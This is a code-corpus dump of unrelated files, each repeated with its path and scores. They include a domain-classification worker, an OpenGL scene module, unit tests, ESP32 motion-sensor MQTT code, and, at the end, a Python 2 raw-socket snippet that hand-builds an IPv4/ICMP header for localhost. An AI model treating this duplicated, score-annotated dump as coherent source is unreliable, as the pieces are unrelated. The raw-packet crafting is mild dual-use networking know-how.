prev_fit_one_behind = fit_now
end_timer = 0
else:
if end_timer > 400:
end_timer = 0
else:
end_timer += 1
if gen%100:
print(fit_now)
final_gen = old_gen
final_fit = evaluate_fitness_of_all(old_gen, sessions, travel_time, daysotw, timezones, dictionary)
I = np.argmin(final_fit)
fit_opt = final_fit[I]
xopt = final_gen[:,I]+1
endtime = time.time()
all_iterations.append(gen)
all_history.append(best_history)
all_fitness.append(fitness_history)
all_times.append(endtime-start)
xopts.append(xopt.tolist())
fopts.append(fit_opt)
print(gen) | 0.154631 | 0.26429 |
import logging
from typing import Optional
import grpc
import redis
from dgad.grpc import classification_pb2, classification_pb2_grpc
class RedisWorker:
def __init__(
self,
redis_host: str,
redis_port: int,
redis_set: str,
grpc_host: str,
grpc_port: str,
):
self.redis_client = redis.Redis(redis_host, redis_port)
self.redis_set = redis_set
self.grpc_host = grpc_host
self.grpc_port = grpc_port
self.counter = 0
def run(self) -> None:
while True:
domain = self.__redis_get_domain_to_classify__()
if domain:
binary_classification = self.classify_domain(domain)
self.counter += self.__redis_store_classification__(
domain, binary_classification
)
if self.counter % 100 == 0:
logging.critical(
"todo: %s, done: %s",
self.redis_client.scard(self.redis_set),
self.redis_client.dbsize(),
)
logging.debug("%s: %s", domain, binary_classification)
else:
logging.info("waiting for domains...")
def classify_domain(self, domain: str) -> str:
with grpc.insecure_channel(f"{self.grpc_host}:{self.grpc_port}") as channel:
stub = classification_pb2_grpc.ClassifierStub(channel)
response = stub.GetClassification(
classification_pb2.Domain(fqdn=domain), wait_for_ready=True
)
return str(response.binary_classification)
def __redis_get_domain_to_classify__(self) -> Optional[str]:
domain = self.redis_client.spop(name=self.redis_set)
if domain:
return str(domain.decode("UTF-8"))
else:
return None
def __redis_store_classification__(
self, domain: str, binary_classification: str
) -> int:
return int(self.redis_client.set(name=domain, value=binary_classification)) # type: ignore[arg-type] | redis-worker/dgad_redis_worker/worker.py | import logging
from typing import Optional
import grpc
import redis
from dgad.grpc import classification_pb2, classification_pb2_grpc
class RedisWorker:
def __init__(
self,
redis_host: str,
redis_port: int,
redis_set: str,
grpc_host: str,
grpc_port: str,
):
self.redis_client = redis.Redis(redis_host, redis_port)
self.redis_set = redis_set
self.grpc_host = grpc_host
self.grpc_port = grpc_port
self.counter = 0
def run(self) -> None:
while True:
domain = self.__redis_get_domain_to_classify__()
if domain:
binary_classification = self.classify_domain(domain)
self.counter += self.__redis_store_classification__(
domain, binary_classification
)
if self.counter % 100 == 0:
logging.critical(
"todo: %s, done: %s",
self.redis_client.scard(self.redis_set),
self.redis_client.dbsize(),
)
logging.debug("%s: %s", domain, binary_classification)
else:
logging.info("waiting for domains...")
def classify_domain(self, domain: str) -> str:
with grpc.insecure_channel(f"{self.grpc_host}:{self.grpc_port}") as channel:
stub = classification_pb2_grpc.ClassifierStub(channel)
response = stub.GetClassification(
classification_pb2.Domain(fqdn=domain), wait_for_ready=True
)
return str(response.binary_classification)
def __redis_get_domain_to_classify__(self) -> Optional[str]:
domain = self.redis_client.spop(name=self.redis_set)
if domain:
return str(domain.decode("UTF-8"))
else:
return None
def __redis_store_classification__(
self, domain: str, binary_classification: str
) -> int:
return int(self.redis_client.set(name=domain, value=binary_classification)) # type: ignore[arg-type] | 0.762778 | 0.156846 |
from pogle_math import Vector, Matrix4x4, Transform
__author__ = '<NAME>'
__copyright__ = "Copyright 2013, The Python OpenGL Engine"
__license__ = "Closed Source"
__version__ = "0.0.1"
__email__ = "<EMAIL>"
__status__ = "Prototype"
class Light(object):
def __init__(self, pos=Vector(0.0, 0.0, 0.0)):
self.position = pos
class Camera(object):
def __init__(self, proj=None, view=None):
if proj is None:
proj = Matrix4x4()
self.proj = proj
if view is None:
view = Matrix4x4()
self.view = view
self._follow_viewport = False
def lookat(self, eye, center=Vector(0, 0, 0), up=Vector(0, 1, 0)):
self.view = Matrix4x4.lookat(eye, center, up)
@staticmethod
def perspective(fovy, near, far):
cam = Camera(Matrix4x4.perspective(fovy, 1.0, near, far))
cam._near = near
cam._fovy = fovy
cam._far = far
cam._follow_viewport = True
return cam
@staticmethod
def ortho(near, far, width, height):
return Camera(Matrix4x4.ortho(near, far, width, height))
class Scene(object):
""" A scene is a container for all your objects.
Basically, it contains a root node to be rendered, a camera and
0 to 3 directional lights.
"""
def __init__(self, camera=None):
if camera is None:
camera = Camera()
self.passes = []
self.camera = camera
self.lights = []
self._nodes = []
def register_pass(self, pass_):
assert pass_ not in self.passes
self.passes.append(pass_)
def unregister_pass(self, pass_):
assert pass_ in self.passes
self.passes.remove(pass_)
def add_node(self, node):
assert node.scene == None, 'The node is already attached to a scene'
self._nodes.append(node)
node.scene = self
self.mark_renderlist_as_dirty()
def mark_renderlist_as_dirty(self):
for p in self.passes:
p.mark_renderlist_as_dirty()
def remove_node(self, node):
assert node.scene == self, 'The node is not attached to this scene'
self._nodes.remove(node)
node.scene = None
self.mark_renderlist_as_dirty()
def add_light(self, light):
self.lights.append(light)
def get_nodes(self, flag):
""" A method returning a list of all nodes having the flag 'flag'
flag -- The flag that must be present on all nodes returned
"""
match = []
for n in self._nodes:
if n.has_flag(flag):
match.append(n)
return match
def get_nodes_i(self, flag):
""" A generator method returning all nodes having the flag 'flag'
flag -- The flag that must be present on all nodes returned
"""
for n in self._nodes:
if n.has_flag(flag):
yield n
def __len__(self):
return len(self._nodes)
@property
def nodes(self):
return self._nodes
class SceneNode(object):
NODE_HAS_GEOMETRY = 1
""" A basic base class for all node types
"""
def __init__(self, transform=None, flags=0x00000000):
self.name = ''
self.flags = flags
# Trick to avoid the one default arg instanciation for all
# If the default arg == Tranform(), every node which doesn't
# specify the transform arg, will use the shared object created
# on file parsing! Not what we want here.
if transform is None:
transform = Transform()
self.transform = transform
self.scene = None
def has_flag(self, flag):
return (self.flags & flag) != 0 | pogle/pogle_scene.py | from pogle_math import Vector, Matrix4x4, Transform
__author__ = '<NAME>'
__copyright__ = "Copyright 2013, The Python OpenGL Engine"
__license__ = "Closed Source"
__version__ = "0.0.1"
__email__ = "<EMAIL>"
__status__ = "Prototype"
class Light(object):
def __init__(self, pos=Vector(0.0, 0.0, 0.0)):
self.position = pos
class Camera(object):
def __init__(self, proj=None, view=None):
if proj is None:
proj = Matrix4x4()
self.proj = proj
if view is None:
view = Matrix4x4()
self.view = view
self._follow_viewport = False
def lookat(self, eye, center=Vector(0, 0, 0), up=Vector(0, 1, 0)):
self.view = Matrix4x4.lookat(eye, center, up)
@staticmethod
def perspective(fovy, near, far):
cam = Camera(Matrix4x4.perspective(fovy, 1.0, near, far))
cam._near = near
cam._fovy = fovy
cam._far = far
cam._follow_viewport = True
return cam
@staticmethod
def ortho(near, far, width, height):
return Camera(Matrix4x4.ortho(near, far, width, height))
class Scene(object):
""" A scene is a container for all your objects.
Basically, it contains a root node to be rendered, a camera and
0 to 3 directional lights.
"""
def __init__(self, camera=None):
if camera is None:
camera = Camera()
self.passes = []
self.camera = camera
self.lights = []
self._nodes = []
def register_pass(self, pass_):
assert pass_ not in self.passes
self.passes.append(pass_)
def unregister_pass(self, pass_):
assert pass_ in self.passes
self.passes.remove(pass_)
def add_node(self, node):
assert node.scene == None, 'The node is already attached to a scene'
self._nodes.append(node)
node.scene = self
self.mark_renderlist_as_dirty()
def mark_renderlist_as_dirty(self):
for p in self.passes:
p.mark_renderlist_as_dirty()
def remove_node(self, node):
assert node.scene == self, 'The node is not attached to this scene'
self._nodes.remove(node)
node.scene = None
self.mark_renderlist_as_dirty()
def add_light(self, light):
self.lights.append(light)
def get_nodes(self, flag):
""" A method returning a list of all nodes having the flag 'flag'
flag -- The flag that must be present on all nodes returned
"""
match = []
for n in self._nodes:
if n.has_flag(flag):
match.append(n)
return match
def get_nodes_i(self, flag):
""" A generator method returning all nodes having the flag 'flag'
flag -- The flag that must be present on all nodes returned
"""
for n in self._nodes:
if n.has_flag(flag):
yield n
def __len__(self):
return len(self._nodes)
@property
def nodes(self):
return self._nodes
class SceneNode(object):
NODE_HAS_GEOMETRY = 1
""" A basic base class for all node types
"""
def __init__(self, transform=None, flags=0x00000000):
self.name = ''
self.flags = flags
# Trick to avoid the one default arg instanciation for all
# If the default arg == Tranform(), every node which doesn't
# specify the transform arg, will use the shared object created
# on file parsing! Not what we want here.
if transform is None:
transform = Transform()
self.transform = transform
self.scene = None
def has_flag(self, flag):
return (self.flags & flag) != 0 | 0.599368 | 0.217234 |
import pytest
import icat
import icat.config
from icat.ids import DataSelection
from conftest import getConfig
@pytest.fixture(scope="module")
def client(setupicat):
client, conf = getConfig()
client.login(conf.auth, conf.credentials)
return client
# parameter lists
param_ids = [
([42], [], []),
([], [47,11], []),
([], [], [6,666,66]),
([42], [47,11], [6,666,66]),
]
param_queries = [
("Investigation [name = '10100601-ST']"),
("Dataset <-> Investigation [name = '10100601-ST']"),
("Datafile <-> Dataset <-> Investigation [name = '10100601-ST']"),
("SELECT dc FROM DataCollection dc "
"INCLUDE dc.dataCollectionDatafiles AS dcdf, dcdf.datafile, "
"dc.dataCollectionDatasets AS dcds, dcds.dataset"),
]
def get_obj_ids(objs):
"""Return a tuple (invIds, dsIds, dfIds) from a list of objects.
"""
invIds = set()
dsIds = set()
dfIds = set()
for o in objs:
if o.BeanName == "Investigation":
invIds.add(o.id)
elif o.BeanName == "Dataset":
dsIds.add(o.id)
elif o.BeanName == "Datafile":
dfIds.add(o.id)
elif o.BeanName == "DataCollection":
for dcds in o.dataCollectionDatasets:
if dcds.dataset:
dsIds.add(dcds.dataset.id)
for dcdf in o.dataCollectionDatafiles:
if dcdf.datafile:
dfIds.add(dcdf.datafile.id)
else:
raise ValueError("Invalid object <%r>" % o)
return (invIds, dsIds, dfIds)
@pytest.mark.parametrize(("invIds", "dsIds", "dfIds"), param_ids)
def test_id_dict(invIds, dsIds, dfIds):
"""Initialize a DataSelection from a dict with object ids.
"""
objs = {
'investigationIds': invIds,
'datasetIds': dsIds,
'datafileIds': dfIds
}
selection = DataSelection(objs)
assert selection.invIds == set(invIds)
assert selection.dsIds == set(dsIds)
assert selection.dfIds == set(dfIds)
@pytest.mark.parametrize(("query"), param_queries)
def test_objlist(client, query):
"""Initialize a DataSelection from a list of objects.
"""
objs = client.search(query)
invIds, dsIds, dfIds = get_obj_ids(objs)
selection = DataSelection(objs)
assert selection.invIds == invIds
assert selection.dsIds == dsIds
assert selection.dfIds == dfIds
def test_entitylist(client):
"""Initialize a DataSelection from an EntityList.
The constructor of DataSelection used to be overly strict such
that only lists of objects have been accepted, but other sequence
types such as an EntityList have been rejected. (Fixed in
957b0c0.)
"""
query = "Investigation INCLUDE Dataset [name = '10100601-ST']"
inv = client.assertedSearch(query)[0]
objs = inv.datasets
assert not isinstance(objs, list)
invIds, dsIds, dfIds = get_obj_ids(objs)
selection = DataSelection(objs)
assert selection.invIds == invIds
assert selection.dsIds == dsIds
assert selection.dfIds == dfIds
@pytest.mark.parametrize(("query"), param_queries)
def test_set(client, query):
"""Initialize a DataSelection from a set of objects.
Newer versions of python-icat allow a DataSelection to be created
from any iterator of objects (not from a Mapping though), in
particular from a set.
"""
objs = client.search(query)
invIds, dsIds, dfIds = get_obj_ids(objs)
s = set(objs)
selection = DataSelection(s)
assert selection.invIds == invIds
assert selection.dsIds == dsIds
assert selection.dfIds == dfIds
@pytest.mark.parametrize(("query"), param_queries)
def test_generator(client, query):
"""Initialize a DataSelection from a generator of objects.
Newer versions of python-icat allow a DataSelection to be created
from any iterator of objects (not from a Mapping though), in
particular from a generator.
"""
def objgenerator(it):
"""Admittedly stupid example for a generator function.
"""
for o in it:
yield o
objs = client.search(query)
invIds, dsIds, dfIds = get_obj_ids(objs)
g = objgenerator(objs)
selection = DataSelection(g)
assert selection.invIds == invIds
assert selection.dsIds == dsIds
assert selection.dfIds == dfIds
@pytest.mark.parametrize(("invIds", "dsIds", "dfIds"), param_ids)
def test_selection(invIds, dsIds, dfIds):
"""Initialize a DataSelection from another DataSelection.
"""
objs = {
'investigationIds': invIds,
'datasetIds': dsIds,
'datafileIds': dfIds
}
sel1 = DataSelection(objs)
assert sel1.invIds == set(invIds)
assert sel1.dsIds == set(dsIds)
assert sel1.dfIds == set(dfIds)
sel2 = DataSelection(sel1)
assert sel2.invIds == set(invIds)
assert sel2.dsIds == set(dsIds)
assert sel2.dfIds == set(dfIds) | tests/test_07_dataselection.py | import pytest
import icat
import icat.config
from icat.ids import DataSelection
from conftest import getConfig
@pytest.fixture(scope="module")
def client(setupicat):
client, conf = getConfig()
client.login(conf.auth, conf.credentials)
return client
# parameter lists
param_ids = [
([42], [], []),
([], [47,11], []),
([], [], [6,666,66]),
([42], [47,11], [6,666,66]),
]
param_queries = [
("Investigation [name = '10100601-ST']"),
("Dataset <-> Investigation [name = '10100601-ST']"),
("Datafile <-> Dataset <-> Investigation [name = '10100601-ST']"),
("SELECT dc FROM DataCollection dc "
"INCLUDE dc.dataCollectionDatafiles AS dcdf, dcdf.datafile, "
"dc.dataCollectionDatasets AS dcds, dcds.dataset"),
]
def get_obj_ids(objs):
"""Return a tuple (invIds, dsIds, dfIds) from a list of objects.
"""
invIds = set()
dsIds = set()
dfIds = set()
for o in objs:
if o.BeanName == "Investigation":
invIds.add(o.id)
elif o.BeanName == "Dataset":
dsIds.add(o.id)
elif o.BeanName == "Datafile":
dfIds.add(o.id)
elif o.BeanName == "DataCollection":
for dcds in o.dataCollectionDatasets:
if dcds.dataset:
dsIds.add(dcds.dataset.id)
for dcdf in o.dataCollectionDatafiles:
if dcdf.datafile:
dfIds.add(dcdf.datafile.id)
else:
raise ValueError("Invalid object <%r>" % o)
return (invIds, dsIds, dfIds)
@pytest.mark.parametrize(("invIds", "dsIds", "dfIds"), param_ids)
def test_id_dict(invIds, dsIds, dfIds):
"""Initialize a DataSelection from a dict with object ids.
"""
objs = {
'investigationIds': invIds,
'datasetIds': dsIds,
'datafileIds': dfIds
}
selection = DataSelection(objs)
assert selection.invIds == set(invIds)
assert selection.dsIds == set(dsIds)
assert selection.dfIds == set(dfIds)
@pytest.mark.parametrize(("query"), param_queries)
def test_objlist(client, query):
"""Initialize a DataSelection from a list of objects.
"""
objs = client.search(query)
invIds, dsIds, dfIds = get_obj_ids(objs)
selection = DataSelection(objs)
assert selection.invIds == invIds
assert selection.dsIds == dsIds
assert selection.dfIds == dfIds
def test_entitylist(client):
"""Initialize a DataSelection from an EntityList.
The constructor of DataSelection used to be overly strict such
that only lists of objects have been accepted, but other sequence
types such as an EntityList have been rejected. (Fixed in
957b0c0.)
"""
query = "Investigation INCLUDE Dataset [name = '10100601-ST']"
inv = client.assertedSearch(query)[0]
objs = inv.datasets
assert not isinstance(objs, list)
invIds, dsIds, dfIds = get_obj_ids(objs)
selection = DataSelection(objs)
assert selection.invIds == invIds
assert selection.dsIds == dsIds
assert selection.dfIds == dfIds
@pytest.mark.parametrize(("query"), param_queries)
def test_set(client, query):
"""Initialize a DataSelection from a set of objects.
Newer versions of python-icat allow a DataSelection to be created
from any iterator of objects (not from a Mapping though), in
particular from a set.
"""
objs = client.search(query)
invIds, dsIds, dfIds = get_obj_ids(objs)
s = set(objs)
selection = DataSelection(s)
assert selection.invIds == invIds
assert selection.dsIds == dsIds
assert selection.dfIds == dfIds
@pytest.mark.parametrize(("query"), param_queries)
def test_generator(client, query):
"""Initialize a DataSelection from a generator of objects.
Newer versions of python-icat allow a DataSelection to be created
from any iterator of objects (not from a Mapping though), in
particular from a generator.
"""
def objgenerator(it):
"""Admittedly stupid example for a generator function.
"""
for o in it:
yield o
objs = client.search(query)
invIds, dsIds, dfIds = get_obj_ids(objs)
g = objgenerator(objs)
selection = DataSelection(g)
assert selection.invIds == invIds
assert selection.dsIds == dsIds
assert selection.dfIds == dfIds
@pytest.mark.parametrize(("invIds", "dsIds", "dfIds"), param_ids)
def test_selection(invIds, dsIds, dfIds):
"""Initialize a DataSelection from another DataSelection.
"""
objs = {
'investigationIds': invIds,
'datasetIds': dsIds,
'datafileIds': dfIds
}
sel1 = DataSelection(objs)
assert sel1.invIds == set(invIds)
assert sel1.dsIds == set(dsIds)
assert sel1.dfIds == set(dfIds)
sel2 = DataSelection(sel1)
assert sel2.invIds == set(invIds)
assert sel2.dsIds == set(dsIds)
assert sel2.dfIds == set(dfIds) | 0.568176 | 0.455078 |
# pylint: enable=line-too-long
from unittest import TestCase
from unittest import main as launch_tests
from unittest.mock import patch
from PyFunceble.abstracts import Version
class TestVersion(TestCase):
"""
Tests of PyFunceble.abstracts.Version
"""
def test_split_version(self):
"""
Tests the case that we want to split the version.
"""
given = "1.0.0.dev (Hello, World!)"
expected = ["1", "0", "0"]
actual = Version.split_versions(given)
self.assertEqual(expected, actual)
def test_split_version_with_non_digits(self):
"""
Tests the case that we want to split the version
but also have the code name.
"""
given = "1.0.0.dev (Hello, World!)"
expected = (["1", "0", "0"], "dev (Hello, World!)")
actual = Version.split_versions(given, return_non_digits=True)
self.assertEqual(expected, actual)
def test_literal_comparison(self):
"""
Tests the literal comparison.
"""
given = "1.0.0.dev (Hello, World!)"
expected = True
actual = Version.literally_compare(given, given)
self.assertEqual(expected, actual)
def test_literal_comparison_different(self):
"""
Tests the litaral comparison for the case that both given version are different.
"""
given = "1.0.0.dev (Hello, World!)"
expected = False
actual = Version.literally_compare(given, given.replace(".", "_"))
self.assertEqual(expected, actual)
@patch("PyFunceble.abstracts.Package.VERSION", "1.0.0.dev (Hello, World)")
def test_compare_local_version_is_same(self):
"""
Tests the comparison for the case that the local version is older.
"""
given = "1.0.0.dev (Hello, World)"
expected = None
actual = Version.compare(given)
self.assertEqual(expected, actual)
@patch("PyFunceble.abstracts.Package.VERSION", "1.50.0.dev (Hello, World)")
def test_compare_local_version_is_older(self):
"""
Tests the comparison for the case that the local version is older.
"""
given = "2.34.0.dev (Hello, World)"
expected = True
actual = Version.compare(given)
self.assertEqual(expected, actual)
@patch("PyFunceble.abstracts.Package.VERSION", "2.10.0.dev (Hello, World)")
def test_compare_local_version_is_newer(self):
"""
Tests the comparison for the case that the local version is older.
"""
given = "1.15.0.dev (Hello, World)"
expected = False
actual = Version.compare(given)
self.assertEqual(expected, actual)
@patch("PyFunceble.abstracts.Package.VERSION", "2.10.0.dev (Hello, World)")
def test_is_local_dev(self):
"""
Tests if the local version is the dev one.
"""
expected = True
actual = Version.is_local_dev()
self.assertEqual(expected, actual)
@patch("PyFunceble.abstracts.Package.VERSION", "2.10.0. (Hello, World)")
def test_is_not_local_dev(self):
"""
Tests if the local version is the not the dev one.
"""
expected = False
actual = Version.is_local_dev()
self.assertEqual(expected, actual)
if __name__ == "__main__":
launch_tests() | tests/test_abstracts_package.py | # pylint: enable=line-too-long
from unittest import TestCase
from unittest import main as launch_tests
from unittest.mock import patch
from PyFunceble.abstracts import Version
class TestVersion(TestCase):
"""
Tests of PyFunceble.abstracts.Version
"""
def test_split_version(self):
"""
Tests the case that we want to split the version.
"""
given = "1.0.0.dev (Hello, World!)"
expected = ["1", "0", "0"]
actual = Version.split_versions(given)
self.assertEqual(expected, actual)
def test_split_version_with_non_digits(self):
"""
Tests the case that we want to split the version
but also have the code name.
"""
given = "1.0.0.dev (Hello, World!)"
expected = (["1", "0", "0"], "dev (Hello, World!)")
actual = Version.split_versions(given, return_non_digits=True)
self.assertEqual(expected, actual)
def test_literal_comparison(self):
"""
Tests the literal comparison.
"""
given = "1.0.0.dev (Hello, World!)"
expected = True
actual = Version.literally_compare(given, given)
self.assertEqual(expected, actual)
def test_literal_comparison_different(self):
"""
Tests the litaral comparison for the case that both given version are different.
"""
given = "1.0.0.dev (Hello, World!)"
expected = False
actual = Version.literally_compare(given, given.replace(".", "_"))
self.assertEqual(expected, actual)
@patch("PyFunceble.abstracts.Package.VERSION", "1.0.0.dev (Hello, World)")
def test_compare_local_version_is_same(self):
"""
Tests the comparison for the case that the local version is older.
"""
given = "1.0.0.dev (Hello, World)"
expected = None
actual = Version.compare(given)
self.assertEqual(expected, actual)
@patch("PyFunceble.abstracts.Package.VERSION", "1.50.0.dev (Hello, World)")
def test_compare_local_version_is_older(self):
"""
Tests the comparison for the case that the local version is older.
"""
given = "2.34.0.dev (Hello, World)"
expected = True
actual = Version.compare(given)
self.assertEqual(expected, actual)
@patch("PyFunceble.abstracts.Package.VERSION", "2.10.0.dev (Hello, World)")
def test_compare_local_version_is_newer(self):
"""
Tests the comparison for the case that the local version is older.
"""
given = "1.15.0.dev (Hello, World)"
expected = False
actual = Version.compare(given)
self.assertEqual(expected, actual)
@patch("PyFunceble.abstracts.Package.VERSION", "2.10.0.dev (Hello, World)")
def test_is_local_dev(self):
"""
Tests if the local version is the dev one.
"""
expected = True
actual = Version.is_local_dev()
self.assertEqual(expected, actual)
@patch("PyFunceble.abstracts.Package.VERSION", "2.10.0. (Hello, World)")
def test_is_not_local_dev(self):
"""
Tests if the local version is the not the dev one.
"""
expected = False
actual = Version.is_local_dev()
self.assertEqual(expected, actual)
if __name__ == "__main__":
launch_tests() | 0.850313 | 0.686941 |
import time
import utime
import machine # tuodaan koko kirjasto
from machine import Pin
from umqttsimple import MQTTClient
import network
import gc
gc.enable() # aktivoidaan automaattinen roskankeruu
# asetetaan hitaampi kellotus 20MHz, 40MHz, 80Mhz, 160MHz or 240MHz
machine.freq(80000000)
print ("Prosessorin nopeus asetettu: %s" %machine.freq())
# Raspberry WiFi on huono ja lisaksi raspin pitaa pingata ESP32 jotta yhteys toimii!
sta_if = network.WLAN(network.STA_IF)
# tuodaan parametrit tiedostosta parametrit.py
from parametrit import CLIENT_ID, MQTT_SERVERI, MQTT_PORTTI, MQTT_KAYTTAJA, \
MQTT_SALASANA, PIR_PINNI, AIHE_LIIKETUNNISTIN
client = MQTTClient(CLIENT_ID, MQTT_SERVERI, MQTT_PORTTI, MQTT_KAYTTAJA, MQTT_SALASANA)
# Liikesensorin pinni
pir = Pin(PIR_PINNI, Pin.IN)
def ratkaise_aika():
(vuosi, kuukausi, kkpaiva, tunti, minuutti, sekunti, viikonpva, vuosipaiva) = utime.localtime()
paivat = {0: "Ma", 1: "Ti", 2: "Ke", 3: "To", 4: "Pe", 5: "La", 6: "Su"}
kuukaudet = {1: "Tam", 2: "Hel", 3: "Maa", 4: "Huh", 5: "Tou", 6: "Kes", 7: "Hei", 8: "Elo",
9: "Syy", 10: "Lok", 11: "Mar", 12: "Jou"}
#.format(paivat[viikonpva]), format(kuukaudet[kuukausi]),
aika = "%s.%s.%s klo %s:%s:%s" % (kkpaiva, kuukausi, \
vuosi, "{:02d}".format(tunti), "{:02d}".format(minuutti), "{:02d}".format(sekunti))
return aika
def mqtt_palvelin_yhdista():
aika = ratkaise_aika()
if sta_if.isconnected():
try:
client.set_callback(viestin_saapuessa)
client.connect()
client.subscribe(AIHE_LIIKETUNNISTIN)
except OSError as e:
print("% s: Ei voida yhdistaa! " % aika)
restart_and_reconnect()
return False
return True
else:
print("%s: Yhteys on poikki! " % aika)
restart_and_reconnect()
return False
def viestin_saapuessa():
''' Tämä on turha, mutta voisi käyttää tilanteessa jossa mqtt-viesti saapuu'''
vilkuta_ledi(1)
return
def laheta_pir(status):
aika = ratkaise_aika()
if sta_if.isconnected():
try:
client.publish(AIHE_LIIKETUNNISTIN, str(status)) # 1 = liiketta, 0 = liike loppunut
except OSError as e:
print("% s: Ei voida yhdistaa! " % aika)
restart_and_reconnect()
return False
return True
else:
print("%s: Yhteys on poikki! " % aika)
restart_and_reconnect()
return False
def vilkuta_ledi(kertaa):
ledipinni = machine.Pin(2, machine.Pin.OUT)
for i in range(kertaa):
ledipinni.on()
utime.sleep_ms(100)
ledipinni.off()
utime.sleep_ms(100)
return
def restart_and_reconnect():
aika = ratkaise_aika()
print('%s: Ongelmia. Boottaillaan 5s kuluttua.' % aika)
vilkuta_ledi(10)
time.sleep(5)
machine.reset()
# resetoidaan
def alustus():
# alustus
mqtt_palvelin_yhdista()
def seuraa_liiketta():
alustus()
on_aika = utime.time()
off_aika = utime.time()
ilmoitettu_on = False
ilmoitettu_off = False
while True:
pir_tila = pir.value()
if (pir_tila == 0) and (ilmoitettu_off == False):
''' Nollataan ilmoitus'''
off_aika = utime.time()
print("Ilmoitettu liikkeen lopusta. Liike kesti %s" %(off_aika - on_aika))
laheta_pir(0)
ilmoitettu_off = True
ilmoitettu_on = False
elif (pir_tila == 1) and (ilmoitettu_on == False):
''' Liikettä havaittu !'''
on_aika = utime.time()
print("Ilmoitetaan liikkeesta!")
laheta_pir(1)
ilmoitettu_on = True
ilmoitettu_off = False
# lasketaan prosessorin kuormaa
time.sleep(0.01)
if __name__ == "__main__":
seuraa_liiketta() | esp32-liiketunnistus/main.py | import time
import utime
import machine # tuodaan koko kirjasto
from machine import Pin
from umqttsimple import MQTTClient
import network
import gc
gc.enable() # aktivoidaan automaattinen roskankeruu
# asetetaan hitaampi kellotus 20MHz, 40MHz, 80Mhz, 160MHz or 240MHz
machine.freq(80000000)
print ("Prosessorin nopeus asetettu: %s" %machine.freq())
# Raspberry WiFi on huono ja lisaksi raspin pitaa pingata ESP32 jotta yhteys toimii!
sta_if = network.WLAN(network.STA_IF)
# tuodaan parametrit tiedostosta parametrit.py
from parametrit import CLIENT_ID, MQTT_SERVERI, MQTT_PORTTI, MQTT_KAYTTAJA, \
MQTT_SALASANA, PIR_PINNI, AIHE_LIIKETUNNISTIN
client = MQTTClient(CLIENT_ID, MQTT_SERVERI, MQTT_PORTTI, MQTT_KAYTTAJA, MQTT_SALASANA)
# Liikesensorin pinni
pir = Pin(PIR_PINNI, Pin.IN)
def ratkaise_aika():
(vuosi, kuukausi, kkpaiva, tunti, minuutti, sekunti, viikonpva, vuosipaiva) = utime.localtime()
paivat = {0: "Ma", 1: "Ti", 2: "Ke", 3: "To", 4: "Pe", 5: "La", 6: "Su"}
kuukaudet = {1: "Tam", 2: "Hel", 3: "Maa", 4: "Huh", 5: "Tou", 6: "Kes", 7: "Hei", 8: "Elo",
9: "Syy", 10: "Lok", 11: "Mar", 12: "Jou"}
#.format(paivat[viikonpva]), format(kuukaudet[kuukausi]),
aika = "%s.%s.%s klo %s:%s:%s" % (kkpaiva, kuukausi, \
vuosi, "{:02d}".format(tunti), "{:02d}".format(minuutti), "{:02d}".format(sekunti))
return aika
def mqtt_palvelin_yhdista():
aika = ratkaise_aika()
if sta_if.isconnected():
try:
client.set_callback(viestin_saapuessa)
client.connect()
client.subscribe(AIHE_LIIKETUNNISTIN)
except OSError as e:
print("% s: Ei voida yhdistaa! " % aika)
restart_and_reconnect()
return False
return True
else:
print("%s: Yhteys on poikki! " % aika)
restart_and_reconnect()
return False
def viestin_saapuessa():
''' Tämä on turha, mutta voisi käyttää tilanteessa jossa mqtt-viesti saapuu'''
vilkuta_ledi(1)
return
def laheta_pir(status):
aika = ratkaise_aika()
if sta_if.isconnected():
try:
client.publish(AIHE_LIIKETUNNISTIN, str(status)) # 1 = liiketta, 0 = liike loppunut
except OSError as e:
print("% s: Ei voida yhdistaa! " % aika)
restart_and_reconnect()
return False
return True
else:
print("%s: Yhteys on poikki! " % aika)
restart_and_reconnect()
return False
def vilkuta_ledi(kertaa):
ledipinni = machine.Pin(2, machine.Pin.OUT)
for i in range(kertaa):
ledipinni.on()
utime.sleep_ms(100)
ledipinni.off()
utime.sleep_ms(100)
return
def restart_and_reconnect():
aika = ratkaise_aika()
print('%s: Ongelmia. Boottaillaan 5s kuluttua.' % aika)
vilkuta_ledi(10)
time.sleep(5)
machine.reset()
# resetoidaan
def alustus():
# alustus
mqtt_palvelin_yhdista()
def seuraa_liiketta():
alustus()
on_aika = utime.time()
off_aika = utime.time()
ilmoitettu_on = False
ilmoitettu_off = False
while True:
pir_tila = pir.value()
if (pir_tila == 0) and (ilmoitettu_off == False):
''' Nollataan ilmoitus'''
off_aika = utime.time()
print("Ilmoitettu liikkeen lopusta. Liike kesti %s" %(off_aika - on_aika))
laheta_pir(0)
ilmoitettu_off = True
ilmoitettu_on = False
elif (pir_tila == 1) and (ilmoitettu_on == False):
''' Liikettä havaittu !'''
on_aika = utime.time()
print("Ilmoitetaan liikkeesta!")
laheta_pir(1)
ilmoitettu_on = True
ilmoitettu_off = False
# lasketaan prosessorin kuormaa
time.sleep(0.01)
if __name__ == "__main__":
seuraa_liiketta() | 0.17621 | 0.136551 |
import sys, socket
from struct import *
def carry_around_add(a, b):
c = a + b
return (c & 0xffff) + (c >> 16)
def checksum(msg):
s = 0
for i in range(0, len(msg), 2):
w = (ord(msg[i]) << 8 ) + ord(msg[i+1])
s = carry_around_add(s, w)
return ~s & 0xffff
try:
s = socket.socket(socket.AF_INET, socket.SOCK_RAW, socket.IPPROTO_RAW)
except socket.error,msg:
print 'Socket could not be created. Error Code : ' + str(msg[0]) + ' Message ' + msg[1]
sys.exit()
ip_source = '127.0.0.1' #本机IP
ip_dest = '127.0.0.1' #也可以用域名:socket.gethostbyname('www.microsoft.com')
#填写ip header
ip_ver = 4 # ipv4
ip_ihl = 5 # Header Length =5, 表示无options部分
ip_dscp = 0 # 以前叫tos,现在叫dscp
ip_total_len = 0 # left for kernel to fill
ip_id = 22222 # fragment相关,随便写个
ip_frag_offset = 0 # fragment相关
ip_ttl = 255 # *nix下TTL一般是255
ip_protocol = socket.IPPROTO_ICMP # 表示后面接的是tcp数据
ip_checksum = 0 # left for kernel to fill
ip_saddr = socket.inet_pton(socket.AF_INET, ip_source) # 两边的ip地址
ip_daddr = socket.inet_pton(socket.AF_INET, ip_dest)
ip_ver_ihl = (ip_ver << 4) + ip_ihl # 俩4-bit数据合并成一个字节
# 按上面描述的结构,构建ip header。
ip_header = pack('!BBHHHBBH4s4s' , ip_ver_ihl, ip_dscp, ip_total_len, ip_id, ip_frag_offset, ip_ttl, ip_protocol, ip_checksum, ip_saddr, ip_daddr)
